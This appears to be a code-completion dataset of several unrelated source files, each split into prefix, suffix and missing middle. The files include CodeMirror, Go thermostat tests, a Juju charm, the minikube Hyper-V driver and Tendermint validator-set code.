if (state.scopes.length == 1) return;
if (state.scopes[0].type === 'py') {
var _indent = stream.indentation();
var _indent_index = -1;
for (var i = 0; i < state.scopes.length; ++i) {
if (_indent === state.scopes[i].offset) {
_indent_index = i;
break;
}
}
if (_indent_index === -1) {
return true;
}
while (state.scopes[0].offset !== _indent) {
state.scopes.shift();
}
return false;
} else {
if (type === 'py') {
state.scopes[0].offset = stream.indentation();
return false;
} else {
if (state.scopes[0].type != type) {
return true;
}
state.scopes.shift();
return false;
}
}
}
function tokenLexer(stream, state) {
indentInfo = null;
var style = state.tokenize(stream, state);
var current = stream.current();
// Handle '.' connected identifiers
if (current === '.') {
style = stream.match(identifiers, false) ? null : ERRORCLASS;
if (style === null && state.lastToken === 'meta') {
// Apply 'meta' style to '.' connected identifiers when
// appropriate.
style = 'meta';
}
return style;
}
// Handle decorators
if (current === '@') {
return stream.match(identifiers, false) ? 'meta' : ERRORCLASS;
}
if ((style === 'variable' || style === 'builtin')
&& state.lastToken === 'meta') {
style = 'meta';
}
// Handle scope changes.
if (current === 'pass' || current === 'return') {
state.dedent += 1;
}
if (current === 'lambda') state.lambda = true;
if ((current === ':' && !state.lambda && state.scopes[0].type == 'py')
|| indentInfo === 'indent') {
indent(stream, state);
}
var delimiter_index = '[({'.indexOf(current);
if (delimiter_index !== -1) {
indent(stream, state, '])}'.slice(delimiter_index, delimiter_index+1));
}
if (indentInfo === 'dedent') {
if (dedent(stream, state)) {
return ERRORCLASS;
}
}
delimiter_index = '])}'.indexOf(current);
if (delimiter_index !== -1) {
if (dedent(stream, state, current)) {
return ERRORCLASS;
}
}
if (state.dedent > 0 && stream.eol() && state.scopes[0].type == 'py') {
if (state.scopes.length > 1) state.scopes.shift();
state.dedent -= 1;
}
return style;
}
var external = {
startState: function(basecolumn) {
return {
tokenize: tokenBase,
scopes: [{offset:basecolumn || 0, type:'py'}],
lastToken: null,
lambda: false,
dedent: 0
};
},
token: function(stream, state) {
var style = tokenLexer(stream, state);
state.lastToken = style;
if (stream.eol() && stream.lambda) {
state.lambda = false;
}
return style;
},
indent: function(state, textAfter) {
if (state.tokenize != tokenBase) {
return 0;
}
return state.scopes[0].offset;
}
};
if (parserConf.overlay != null) {
// overlay a mode over this mode
return CodeMirror.overlayMode(external, CodeMirror.getMode(conf, parserConf.overlay));
} else {
return external;
}
});
CodeMirror.defineMIME("text/x-plasm", "plasm"); | |
external-module-id-strategy.d.ts | export declare const externalModuleIdStrategy: (moduleId: string, embedded?: string[]) => boolean; |
||
pkg.develspace.context.pc.py | # generated from catkin/cmake/template/pkg.context.pc.in
CATKIN_PACKAGE_PREFIX = ""
PROJECT_PKG_CONFIG_INCLUDE_DIRS = "/home/kalyco/mfp_workspace/src/srslib_test/include".split(';') if "/home/kalyco/mfp_workspace/src/srslib_test/include" != "" else []
PROJECT_CATKIN_DEPENDS = "".replace(';', ' ') | PKG_CONFIG_LIBRARIES_WITH_PREFIX = "-lsrslib_test".split(';') if "-lsrslib_test" != "" else []
PROJECT_NAME = "srslib_test"
PROJECT_SPACE_DIR = "/home/kalyco/mfp_workspace/devel/.private/srslib_test"
PROJECT_VERSION = "1.0.0" |
|
setting_test.go | package setting
import (
"context"
"fmt"
"github.com/stretchr/testify/assert"
"github.com/stretchr/testify/require"
"math"
"testing"
"thermostat/db"
"thermostat/db/mode"
"thermostat/db/zone"
"time"
)
func TestAddSetting(t *testing.T) {
t.Parallel()
ctx := context.TODO()
now := time.Now()
later := now.Add(time.Minute)
z, err := zone.New(ctx, t.Name())
require.NoError(t, err)
m, err := mode.New(ctx, z.ID, t.Name(), 60, 80, 1)
require.NoError(t, err)
s, err := New(ctx, z.ID, m.ID, DEFAULT, 1, now, later, 1, 86400)
require.NoError(t, err)
assert.Equal(t, DEFAULT, s.Priority)
assert.Equal(t, 1, s.DayOfWeek)
assert.Equal(t, now, s.StartDay)
assert.Equal(t, later, s.EndDay)
assert.Equal(t, 1, s.StartTime)
assert.Equal(t, 86400, s.EndTime)
}
func settingExists(t testing.TB, ctx context.Context, id int64) bool {
t.Helper()
row := db.DB.QueryRowContext(ctx, "select id from setting where id=?", id)
var check int
_ = row.Scan(&check)
return check != 0
}
func TestSetting_Delete(t *testing.T) {
t.Parallel()
ctx := context.TODO()
z, err := zone.New(ctx, t.Name())
require.NoError(t, err)
m, err := mode.New(ctx, z.ID, t.Name(), 70, 80, 1)
require.NoError(t, err)
s, err := New(ctx, z.ID, m.ID, SCHEDULED, 1, time.Now(), time.Now().Add(time.Minute), 0, 50)
require.NoError(t, err)
assert.True(t, settingExists(t, ctx, s.ID))
err = s.Delete(ctx)
require.NoError(t, err)
assert.False(t, settingExists(t, ctx, s.ID))
}
func TestSetting_Runtime(t *testing.T) {
t.Parallel()
now := time.Date(2019, 12, 31, 12, 12, 13, 0, time.Local) // Tuesday
tests := []struct {
name string
start, end time.Time
startTime, endTime int
dayOfWeek []time.Weekday
expected time.Time
}{
{
name: "before start date",
start: now.AddDate(0, 0, 10),
end: now.AddDate(0, 0, 11),
startTime: 0,
endTime: 86400,
dayOfWeek: []time.Weekday{time.Sunday, time.Monday, time.Tuesday, time.Wednesday, time.Thursday, time.Friday, time.Saturday},
expected: now.AddDate(0, 0, 10),
},
{
name: "after end date",
start: now.AddDate(0, 0, -10),
end: now.AddDate(0, 0, -1),
startTime: 0,
endTime: 86400,
dayOfWeek: []time.Weekday{time.Sunday, time.Monday, time.Tuesday, time.Wednesday, time.Thursday, time.Friday, time.Saturday},
expected: time.Time{},
},
{
name: "today now",
start: now.AddDate(0, 0, -10),
end: now.AddDate(0, 0, 10),
startTime: 0,
endTime: 86400,
dayOfWeek: []time.Weekday{time.Tuesday},
expected: now,
},
{
name: "today but later",
start: now.AddDate(0, 0, -10),
end: now.AddDate(0, 0, 10),
startTime: 60 * 60 * 14,
endTime: 60 * 60 * 18,
dayOfWeek: []time.Weekday{time.Tuesday},
expected: time.Date(now.Year(), now.Month(), now.Day(), 14, 0, 0, 0, now.Location()),
},
{
name: "today but earlier",
start: now.AddDate(0, 0, -10),
end: now.AddDate(0, 0, 10),
startTime: 60 * 60 * 4,
endTime: 60 * 60 * 8,
dayOfWeek: []time.Weekday{time.Tuesday},
expected: time.Date(now.Year(), now.Month(), now.Day()+7, 4, 0, 0, 0, now.Location()),
},
{
name: "tomorrow",
start: now.AddDate(0, 0, -10),
end: now.AddDate(0, 0, 10),
startTime: 60 * 60 * 4,
endTime: 60 * 60 * 8,
dayOfWeek: []time.Weekday{time.Sunday, time.Monday, time.Wednesday, time.Thursday, time.Friday, time.Saturday},
expected: time.Date(now.Year(), now.Month(), now.Day()+1, 4, 0, 0, 0, now.Location()),
},
}
for i, tt := range tests {
t.Run(fmt.Sprintf("%d: %s", i, tt.name), func(t *testing.T) {
var dayOfWeek int
for _, d := range tt.dayOfWeek {
dayOfWeek |= 2 << uint(d)
}
s := Setting{
DayOfWeek: dayOfWeek,
StartDay: tt.start,
EndDay: tt.end,
StartTime: tt.startTime,
EndTime: tt.endTime,
}
runtime := s.Runtime(now)
// strip monotonic clock readings with Round(0) so == will work
assert.Equal(t, tt.expected.Round(0), runtime.Round(0))
})
}
}
func TestOverlaps(t *testing.T) {
t.Parallel()
ctx := context.TODO()
now := time.Now()
z1, err := zone.New(ctx, t.Name()+"1")
require.NoError(t, err)
z2, err := zone.New(ctx, t.Name()+"2")
require.NoError(t, err)
m1, err := mode.New(ctx, z1.ID, t.Name()+"1", 70, 80, 1)
require.NoError(t, err)
m2, err := mode.New(ctx, z1.ID, t.Name()+"2", 71, 79, 2)
require.NoError(t, err)
m3, err := mode.New(ctx, z2.ID, t.Name()+"1", 70, 80, 1)
require.NoError(t, err)
existing, err := New(ctx, z1.ID, m1.ID, SCHEDULED, WeekdayMask(time.Monday)|WeekdayMask(time.Wednesday), now, now.Add(time.Hour*24*30), 32400, 61200) // 9 to 5 monday and wednesday for the next 30 days
require.NoError(t, err)
tests := []struct {
name string
zone zone.Zone
priority Priority
weekdays []time.Weekday
start time.Time
end time.Time
startTime int
endTime int
overlap bool
}{
{ | name: "different zone",
zone: z2,
overlap: false,
},
{
name: "different priority",
priority: OVERRIDE,
overlap: false,
},
{
name: "span is before",
start: existing.StartDay.Add(-time.Hour * 24),
end: existing.StartDay.Add(-time.Second),
overlap: false,
},
{
name: "span is after",
start: existing.EndDay.Add(time.Second),
end: existing.EndDay.Add(time.Hour * 24),
overlap: false,
},
{
name: "different weekday",
weekdays: []time.Weekday{time.Sunday, time.Tuesday, time.Thursday, time.Friday, time.Saturday},
overlap: false,
},
{
name: "before",
startTime: 0,
endTime: existing.StartTime - 1,
overlap: false,
},
{
name: "after",
startTime: existing.EndTime + 1,
endTime: 86400,
overlap: false,
},
{
name: "overlaps start time",
startTime: 0,
endTime: existing.StartTime,
overlap: true,
},
{
name: "overlaps end time",
startTime: existing.EndTime,
endTime: 86400,
overlap: true,
},
{
name: "overlaps start span",
start: existing.StartDay.Add(-time.Hour * 24),
end: existing.StartDay,
overlap: true,
},
{
name: "overlaps end span",
start: existing.EndDay,
end: existing.EndDay.Add(time.Hour * 24),
overlap: true,
},
{
name: "covers span",
start: existing.StartDay.Add(-time.Second),
end: existing.EndDay.Add(time.Second),
overlap: true,
},
{
name: "inside span",
start: existing.StartDay.Add(time.Second),
end: existing.EndDay.Add(-time.Second),
overlap: true,
},
{
name: "covers time",
startTime: existing.StartTime - 1,
endTime: existing.EndTime + 1,
overlap: true,
},
{
name: "inside time",
startTime: existing.StartTime + 1,
endTime: existing.EndTime - 1,
overlap: true,
},
}
for i, tt := range tests {
t.Run(fmt.Sprintf("%d: %s", i, tt.name), func(t *testing.T) {
var m mode.Mode
switch tt.zone.ID {
case z2.ID:
m = m3
case z1.ID:
fallthrough
default:
m = m2
}
sched := Setting{
ZoneID: z1.ID,
ModeID: m.ID,
Priority: existing.Priority,
DayOfWeek: existing.DayOfWeek,
StartDay: existing.StartDay,
EndDay: existing.EndDay,
StartTime: existing.StartTime,
EndTime: existing.EndTime,
}
if tt.zone.ID != 0 {
sched.ZoneID = tt.zone.ID
}
if tt.priority != 0 {
sched.Priority = tt.priority
}
if tt.weekdays != nil {
sched.DayOfWeek = 0
for _, d := range tt.weekdays {
sched.DayOfWeek |= WeekdayMask(d)
}
}
if !tt.start.IsZero() {
sched.StartDay = tt.start
}
if !tt.end.IsZero() {
sched.EndDay = tt.end
}
if tt.startTime != 0 {
sched.StartTime = tt.startTime
}
if tt.endTime != 0 {
sched.EndTime = tt.endTime
}
overlap := Overlaps(sched, existing)
assert.Equal(t, tt.overlap, overlap)
})
}
}
func TestValidate(t *testing.T) {
t.Parallel()
ctx := context.TODO()
now := time.Now()
z1, err := zone.New(ctx, t.Name()+"1")
require.NoError(t, err)
m1, err := mode.New(ctx, z1.ID, t.Name()+"1", 70, 80, 1)
require.NoError(t, err)
m2, err := mode.New(ctx, z1.ID, t.Name()+"2", 71, 79, 2)
require.NoError(t, err)
existing, err := New(ctx, z1.ID, m1.ID, SCHEDULED, WeekdayMask(time.Monday)|WeekdayMask(time.Wednesday), now, now.Add(time.Hour*24*30), 32400, 61200) // 9 to 5 monday and wednesday for the next 30 days
require.NoError(t, err)
tests := []struct {
name string
weekdays []time.Weekday
start time.Time
end time.Time
startTime int
endTime int
err string
}{
{
name: "valid",
weekdays: []time.Weekday{time.Tuesday},
},
{
name: "backward span",
weekdays: []time.Weekday{time.Tuesday},
start: existing.EndDay,
end: existing.StartDay,
err: "setting start must be before setting end",
},
{
name: "backward time",
weekdays: []time.Weekday{time.Tuesday},
startTime: existing.EndTime,
endTime: existing.StartTime,
err: "setting end time must be after start time",
},
{
name: "no days",
err: "setting must be active on at least one day of the week",
},
{
name: "overlapping",
weekdays: []time.Weekday{time.Monday},
err: fmt.Sprintf("new setting overlaps with setting %d", existing.ID),
},
}
for i, tt := range tests {
t.Run(fmt.Sprintf("%d: %s", i, tt.name), func(t *testing.T) {
sched := Setting{
ZoneID: z1.ID,
ModeID: m2.ID,
Priority: existing.Priority,
StartDay: existing.StartDay,
EndDay: existing.EndDay,
StartTime: existing.StartTime,
EndTime: existing.EndTime,
}
for _, d := range tt.weekdays {
sched.DayOfWeek |= WeekdayMask(d)
}
if !tt.start.IsZero() {
sched.StartDay = tt.start
}
if !tt.end.IsZero() {
sched.EndDay = tt.end
}
if tt.startTime != 0 {
sched.StartTime = tt.startTime
}
if tt.endTime != 0 {
sched.EndTime = tt.endTime
}
err := Validate(ctx, sched)
if tt.err != "" {
assert.EqualError(t, err, tt.err)
} else {
assert.NoError(t, err)
}
})
}
}
func TestWeekdayMask(t *testing.T) {
t.Parallel()
for i := time.Sunday; i <= time.Saturday; i++ {
assert.Equal(t, int(math.Pow(2, float64(i+1))), WeekdayMask(i), "Day %s", i)
}
} | |
requires.py | from charms.reactive import Endpoint, when, set_flag, clear_flag
import charmhelpers.core.hookenv as hookenv
from charmhelpers.core.hookenv import log
class GearmanRequires(Endpoint):
@when('endpoint.{endpoint_name}.joined')
def | (self):
# if any(unit.received['port'] for unit in self.all_joined_units):
set_flag(self.expand_name('available'))
@when('endpoint.{endpoint_name}.changed')
def changed(self):
# if any(unit.received['port'] for unit in self.all_joined_units):
set_flag(self.expand_name('available'))
def address(self):
"""Get the address to access Gearman over."""
for relation in self.relations:
for unit in relation.joined_units:
log("Unit: {}".format(unit.received))
address = unit.received['ingress-address']
if address is not None:
return address
| joined |
hyperv.go | //go:build windows
// +build windows
/*
Copyright 2018 The Kubernetes Authors All rights reserved.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
*/
package hyperv
import (
"context"
"fmt"
"os/exec"
"strings"
"time"
"github.com/docker/machine/drivers/hyperv"
"github.com/docker/machine/libmachine/drivers"
"github.com/pkg/errors"
"k8s.io/minikube/pkg/minikube/config"
"k8s.io/minikube/pkg/minikube/download"
"k8s.io/minikube/pkg/minikube/driver"
"k8s.io/minikube/pkg/minikube/localpath"
"k8s.io/minikube/pkg/minikube/registry"
)
const (
docURL = "https://minikube.sigs.k8s.io/docs/reference/drivers/hyperv/"
defaultExternalSwitchName = "minikube"
)
func init() {
if err := registry.Register(registry.DriverDef{
Name: driver.HyperV,
Init: func() drivers.Driver { return hyperv.NewDriver("", "") },
Config: configure,
Status: status,
Default: true,
Priority: registry.Preferred,
}); err != nil {
panic(fmt.Sprintf("register: %v", err))
}
}
func configure(cfg config.ClusterConfig, n config.Node) (interface{}, error) |
func status() registry.State {
path, err := exec.LookPath("powershell")
if err != nil {
return registry.State{Error: err}
}
ctx, cancel := context.WithTimeout(context.Background(), 8*time.Second)
defer cancel()
cmd := exec.CommandContext(ctx, path, "-NoProfile", "-NonInteractive", "@(Get-Wmiobject Win32_ComputerSystem).HypervisorPresent")
out, err := cmd.CombinedOutput()
if err != nil {
errorMessage := fmt.Errorf("%s failed:\n%s", strings.Join(cmd.Args, " "), out)
fixMessage := "Start PowerShell as an Administrator"
return registry.State{Installed: false, Running: true, Error: errorMessage, Fix: fixMessage, Doc: docURL}
}
// Get-Wmiobject does not return an error code for false
if strings.TrimSpace(string(out)) != "True" {
errorMessage := fmt.Errorf("%s returned %q", strings.Join(cmd.Args, " "), out)
fixMessage := "Enable Hyper-V: Start PowerShell as Administrator, and run: 'Enable-WindowsOptionalFeature -Online -FeatureName Microsoft-Hyper-V -All'"
return registry.State{Installed: false, Running: false, Error: errorMessage, Fix: fixMessage, Doc: docURL}
}
// Ensure user is either a Windows Administrator or a Hyper-V Administrator.
adminCheckCmd := exec.CommandContext(ctx, path, "-NoProfile", "-NonInteractive", `@([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] "Administrator")`)
adminCheckOut, adminCheckErr := adminCheckCmd.CombinedOutput()
if adminCheckErr != nil {
errorMessage := fmt.Errorf("%s returned %q", strings.Join(adminCheckCmd.Args, " "), adminCheckOut)
fixMessage := "Unable to determine current user's administrator privileges"
return registry.State{Installed: true, Running: false, Error: errorMessage, Fix: fixMessage}
}
hypervAdminCheckCmd := exec.CommandContext(ctx, path, "-NoProfile", "-NonInteractive", `@([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole(([System.Security.Principal.SecurityIdentifier]::new("S-1-5-32-578")))`)
hypervAdminCheckOut, hypervAdminCheckErr := hypervAdminCheckCmd.CombinedOutput()
if hypervAdminCheckErr != nil {
errorMessage := fmt.Errorf("%s returned %q", strings.Join(hypervAdminCheckCmd.Args, " "), hypervAdminCheckOut)
fixMessage := "Unable to determine current user's Hyper-V administrator privileges."
return registry.State{Installed: true, Running: false, Error: errorMessage, Fix: fixMessage}
}
if (strings.TrimSpace(string(adminCheckOut)) != "True") && (strings.TrimSpace(string(hypervAdminCheckOut)) != "True") {
err := fmt.Errorf("Hyper-V requires Administrator privileges")
fixMessage := "Right-click the PowerShell icon and select Run as Administrator to open PowerShell in elevated mode."
return registry.State{Installed: true, Running: false, Error: err, Fix: fixMessage}
}
return registry.State{Installed: true, Healthy: true}
}
| {
d := hyperv.NewDriver(config.MachineName(cfg, n), localpath.MiniPath())
d.Boot2DockerURL = download.LocalISOResource(cfg.MinikubeISO)
d.VSwitch = cfg.HypervVirtualSwitch
if d.VSwitch == "" && cfg.HypervUseExternalSwitch {
switchName, adapter, err := chooseSwitch(cfg.HypervExternalAdapter)
if err != nil {
return nil, errors.Wrapf(err, "failed to choose switch for Hyper-V driver")
}
if cfg.HypervExternalAdapter == "" && switchName == "" {
// create a switch on the returned adapter
switchName = defaultExternalSwitchName
err := createVMSwitch(switchName, adapter)
if err != nil {
return "", err
}
}
d.VSwitch = switchName
}
d.MemSize = cfg.Memory
d.CPU = cfg.CPUs
d.DiskSize = cfg.DiskSize
d.SSHUser = "docker"
d.DisableDynamicMemory = true // default to disable dynamic memory as minikube is unlikely to work properly with dynamic memory
return d, nil
} |
validator_set.go | package types
import (
"bytes"
"fmt"
"sort"
"strings"
"github.com/pkg/errors"
cmn "github.com/tendermint/tmlibs/common"
"github.com/tendermint/tmlibs/merkle"
)
// ValidatorSet represent a set of *Validator at a given height.
// The validators can be fetched by address or index.
// The index is in order of .Address, so the indices are fixed
// for all rounds of a given blockchain height.
// On the other hand, the .AccumPower of each validator and
// the designated .GetProposer() of a set changes every round,
// upon calling .IncrementAccum().
// NOTE: Not goroutine-safe.
// NOTE: All get/set to validators should copy the value for safety.
// TODO: consider validator Accum overflow
type ValidatorSet struct {
// NOTE: persisted via reflect, must be exported.
Validators []*Validator `json:"validators"`
Proposer *Validator `json:"proposer"`
Height int64 // The validators for the height
// cached (unexported)
totalVotingPower int64
}
func NewValidatorSet(vals []*Validator) *ValidatorSet {
validators := make([]*Validator, len(vals))
for i, val := range vals {
validators[i] = val.Copy()
}
sort.Sort(ValidatorsByAddress(validators))
vs := &ValidatorSet{
Validators: validators,
}
if vals != nil {
vs.IncrementAccum(1)
}
return vs
}
// incrementAccum and update the proposer
// TODO: mind the overflow when times and votingPower shares too large.
func (valSet *ValidatorSet) IncrementAccum(times int) {
// Add VotingPower * times to each validator and order into heap.
validatorsHeap := cmn.NewHeap()
for _, val := range valSet.Validators {
val.Accum += val.VotingPower * int64(times) // TODO: mind overflow
validatorsHeap.Push(val, accumComparable{val})
}
// Decrement the validator with most accum times times
for i := 0; i < times; i++ {
mostest := validatorsHeap.Peek().(*Validator)
if i == times-1 {
valSet.Proposer = mostest
}
mostest.Accum -= int64(valSet.TotalVotingPower())
validatorsHeap.Update(mostest, accumComparable{mostest})
}
}
func (valSet *ValidatorSet) Copy() *ValidatorSet {
validators := make([]*Validator, len(valSet.Validators))
for i, val := range valSet.Validators {
// NOTE: must copy, since IncrementAccum updates in place.
validators[i] = val.Copy()
}
return &ValidatorSet{
Validators: validators,
Proposer: valSet.Proposer,
Height: valSet.Height,
totalVotingPower: valSet.totalVotingPower,
}
}
func (valSet *ValidatorSet) HasAddress(address []byte) bool {
idx := sort.Search(len(valSet.Validators), func(i int) bool {
return bytes.Compare(address, valSet.Validators[i].Address) <= 0
})
return idx != len(valSet.Validators) && bytes.Equal(valSet.Validators[idx].Address, address)
}
func (valSet *ValidatorSet) GetByAddress(address []byte) (index int, val *Validator) {
idx := sort.Search(len(valSet.Validators), func(i int) bool {
return bytes.Compare(address, valSet.Validators[i].Address) <= 0
})
if idx != len(valSet.Validators) && bytes.Equal(valSet.Validators[idx].Address, address) {
return idx, valSet.Validators[idx].Copy()
} else {
return 0, nil
}
}
// GetByIndex returns the validator by index.
// It returns nil values if index < 0 or
// index >= len(ValidatorSet.Validators)
func (valSet *ValidatorSet) GetByIndex(index int) (address []byte, val *Validator) {
if index < 0 || index >= len(valSet.Validators) {
return nil, nil
}
val = valSet.Validators[index]
return val.Address, val.Copy()
}
func (valSet *ValidatorSet) Size() int {
return len(valSet.Validators)
}
func (valSet *ValidatorSet) TotalVotingPower() int64 {
if valSet.totalVotingPower == 0 {
for _, val := range valSet.Validators {
valSet.totalVotingPower += val.VotingPower
}
}
return valSet.totalVotingPower
}
func (valSet *ValidatorSet) GetProposer() (proposer *Validator) {
if len(valSet.Validators) == 0 {
return nil
}
if valSet.Proposer == nil {
valSet.Proposer = valSet.findProposer()
}
return valSet.Proposer.Copy()
}
// check if its proposer for height
func (valSet *ValidatorSet) GetProposerAtHeight(height int64, round int) (proposer *Validator) {
if len(valSet.Validators) == 0 {
return nil
}
if (height + int64(round)) > (valSet.Height + 1) {
tmpValSet := valSet.Copy()
tmpValSet.IncrementAccum(int(height + int64(round) - (valSet.Height + 1)))
if tmpValSet.Proposer == nil {
tmpValSet.Proposer = tmpValSet.findProposer()
}
return tmpValSet.Proposer.Copy()
}
if valSet.Proposer == nil {
valSet.Proposer = valSet.findProposer()
}
return valSet.Proposer.Copy()
}
func (valSet *ValidatorSet) findProposer() *Validator {
var proposer *Validator
for _, val := range valSet.Validators {
if proposer == nil || !bytes.Equal(val.Address, proposer.Address) {
proposer = proposer.CompareAccum(val)
}
}
return proposer
}
func (valSet *ValidatorSet) Hash() []byte {
if len(valSet.Validators) == 0 {
return nil
}
hashables := make([]merkle.Hashable, len(valSet.Validators))
for i, val := range valSet.Validators {
hashables[i] = val
}
return merkle.SimpleHashFromHashables(hashables)
}
func (valSet *ValidatorSet) Add(val *Validator) (added bool) {
val = val.Copy()
idx := sort.Search(len(valSet.Validators), func(i int) bool {
return bytes.Compare(val.Address, valSet.Validators[i].Address) <= 0
})
if idx == len(valSet.Validators) {
valSet.Validators = append(valSet.Validators, val)
// Invalidate cache
valSet.Proposer = nil
valSet.totalVotingPower = 0
return true
} else if bytes.Equal(valSet.Validators[idx].Address, val.Address) {
return false
} else {
newValidators := make([]*Validator, len(valSet.Validators)+1)
copy(newValidators[:idx], valSet.Validators[:idx])
newValidators[idx] = val
copy(newValidators[idx+1:], valSet.Validators[idx:])
valSet.Validators = newValidators
// Invalidate cache
valSet.Proposer = nil
valSet.totalVotingPower = 0
return true
}
}
func (valSet *ValidatorSet) Update(val *Validator) (updated bool) {
index, sameVal := valSet.GetByAddress(val.Address)
if sameVal == nil {
return false
} else {
valSet.Validators[index] = val.Copy()
// Invalidate cache
valSet.Proposer = nil
valSet.totalVotingPower = 0
return true
}
}
func (valSet *ValidatorSet) Remove(address []byte) (val *Validator, removed bool) {
idx := sort.Search(len(valSet.Validators), func(i int) bool {
return bytes.Compare(address, valSet.Validators[i].Address) <= 0
})
if idx == len(valSet.Validators) || !bytes.Equal(valSet.Validators[idx].Address, address) {
return nil, false
} else {
removedVal := valSet.Validators[idx]
newValidators := valSet.Validators[:idx]
if idx+1 < len(valSet.Validators) {
newValidators = append(newValidators, valSet.Validators[idx+1:]...)
}
valSet.Validators = newValidators
// Invalidate cache
valSet.Proposer = nil
valSet.totalVotingPower = 0
return removedVal, true
}
}
func (valSet *ValidatorSet) Iterate(fn func(index int, val *Validator) bool) {
for i, val := range valSet.Validators {
stop := fn(i, val.Copy())
if stop {
break
}
}
}
// Verify that +2/3 of the set had signed the given signBytes
func (valSet *ValidatorSet) VerifyCommit(chainID string, blockID BlockID, height int64, commit *Commit) error {
if valSet.Size() != len(commit.Precommits) {
return fmt.Errorf("Invalid commit -- wrong set size: %v vs %v", valSet.Size(), len(commit.Precommits))
}
if height != commit.Height() {
return fmt.Errorf("Invalid commit -- wrong height: %v vs %v", height, commit.Height())
}
talliedVotingPower := int64(0)
round := commit.Round()
for idx, precommit := range commit.Precommits {
// may be nil if validator skipped.
if precommit == nil {
continue
}
if precommit.Height != height {
return fmt.Errorf("Invalid commit -- wrong height: %v vs %v", height, precommit.Height)
}
if precommit.Round != round {
return fmt.Errorf("Invalid commit -- wrong round: %v vs %v", round, precommit.Round)
}
if precommit.Type != VoteTypePrecommit {
return fmt.Errorf("Invalid commit -- not precommit @ index %v", idx)
}
_, val := valSet.GetByIndex(idx)
// Validate signature
precommitSignBytes := SignBytes(chainID, precommit)
if !val.PubKey.VerifyBytes(precommitSignBytes, precommit.Signature) {
return fmt.Errorf("Invalid commit -- invalid signature: %v", precommit)
}
if !blockID.Equals(precommit.BlockID) {
continue // Not an error, but doesn't count
}
// Good precommit!
talliedVotingPower += val.VotingPower
}
if talliedVotingPower > valSet.TotalVotingPower()*2/3 {
return nil
} else {
return fmt.Errorf("Invalid commit -- insufficient voting power: got %v, needed %v",
talliedVotingPower, (valSet.TotalVotingPower()*2/3 + 1))
}
}
// VerifyCommitAny will check to see if the set would
// be valid with a different validator set.
//
// valSet is the validator set that we know
// * over 2/3 of the power in old signed this block
//
// newSet is the validator set that signed this block
// * only votes from old are sufficient for 2/3 majority
// in the new set as well
//
// That means that:
// * 10% of the valset can't just declare themselves kings
// * If the validator set is 3x old size, we need more proof to trust
func (valSet *ValidatorSet) VerifyCommitAny(newSet *ValidatorSet, chainID string,
blockID BlockID, height int64, commit *Commit) error {
if newSet.Size() != len(commit.Precommits) {
return errors.Errorf("Invalid commit -- wrong set size: %v vs %v", newSet.Size(), len(commit.Precommits))
}
if height != commit.Height() {
return errors.Errorf("Invalid commit -- wrong height: %v vs %v", height, commit.Height())
}
oldVotingPower := int64(0)
newVotingPower := int64(0)
seen := map[int]bool{}
round := commit.Round()
for idx, precommit := range commit.Precommits {
// first check as in VerifyCommit
if precommit == nil {
continue
}
if precommit.Height != height {
// return certerr.ErrHeightMismatch(height, precommit.Height)
return errors.Errorf("Blocks don't match - %d vs %d", round, precommit.Round)
}
if precommit.Round != round {
return errors.Errorf("Invalid commit -- wrong round: %v vs %v", round, precommit.Round)
}
if precommit.Type != VoteTypePrecommit {
return errors.Errorf("Invalid commit -- not precommit @ index %v", idx)
}
if !blockID.Equals(precommit.BlockID) {
continue // Not an error, but doesn't count
}
// we only grab by address, ignoring unknown validators
vi, ov := valSet.GetByAddress(precommit.ValidatorAddress)
if ov == nil || seen[vi] {
continue // missing or double vote...
}
seen[vi] = true
// Validate signature old school
precommitSignBytes := SignBytes(chainID, precommit)
if !ov.PubKey.VerifyBytes(precommitSignBytes, precommit.Signature) {
return errors.Errorf("Invalid commit -- invalid signature: %v", precommit)
}
// Good precommit!
oldVotingPower += ov.VotingPower
// check new school
_, cv := newSet.GetByIndex(idx)
if cv.PubKey.Equals(ov.PubKey) {
// make sure this is properly set in the current block as well
newVotingPower += cv.VotingPower
}
}
if oldVotingPower <= valSet.TotalVotingPower()*2/3 {
return errors.Errorf("Invalid commit -- insufficient old voting power: got %v, needed %v",
oldVotingPower, (valSet.TotalVotingPower()*2/3 + 1))
} else if newVotingPower <= newSet.TotalVotingPower()*2/3 {
return errors.Errorf("Invalid commit -- insufficient cur voting power: got %v, needed %v",
newVotingPower, (newSet.TotalVotingPower()*2/3 + 1))
}
return nil
}
func (valSet *ValidatorSet) String() string {
return valSet.StringIndented("")
}
func (valSet *ValidatorSet) StringIndented(indent string) string {
if valSet == nil {
return "nil-ValidatorSet"
}
valStrings := []string{}
valSet.Iterate(func(index int, val *Validator) bool {
valStrings = append(valStrings, val.String())
return false
})
return fmt.Sprintf(`ValidatorSet{
%s Proposer: %v
%s Validators:
%s %v
%s}`,
indent, valSet.GetProposer().String(),
indent,
indent, strings.Join(valStrings, "\n"+indent+" "),
indent)
}
//-------------------------------------
// Implements sort for sorting validators by address.
type ValidatorsByAddress []*Validator
func (vs ValidatorsByAddress) Len() int {
return len(vs)
}
func (vs ValidatorsByAddress) Less(i, j int) bool {
return bytes.Compare(vs[i].Address, vs[j].Address) == -1
}
func (vs ValidatorsByAddress) Swap(i, j int) {
it := vs[i]
vs[i] = vs[j]
vs[j] = it
}
//-------------------------------------
// Use with Heap for sorting validators by accum
type accumComparable struct {
*Validator
}
// We want to find the validator with the greatest accum.
func (ac accumComparable) Less(o interface{}) bool {
other := o.(accumComparable).Validator
larger := ac.CompareAccum(other)
return bytes.Equal(larger.Address, ac.Address)
}
//----------------------------------------
// For testing
// RandValidatorSet returns a randomized validator set, useful for testing.
// NOTE: PrivValidator are in order.
// UNSTABLE
func | (numValidators int, votingPower int64) (*ValidatorSet, []*PrivValidatorFS) {
vals := make([]*Validator, numValidators)
privValidators := make([]*PrivValidatorFS, numValidators)
for i := 0; i < numValidators; i++ {
val, privValidator := RandValidator(false, votingPower)
vals[i] = val
privValidators[i] = privValidator
}
valSet := NewValidatorSet(vals)
sort.Sort(PrivValidatorsByAddress(privValidators))
return valSet, privValidators
}
| RandValidatorSet |
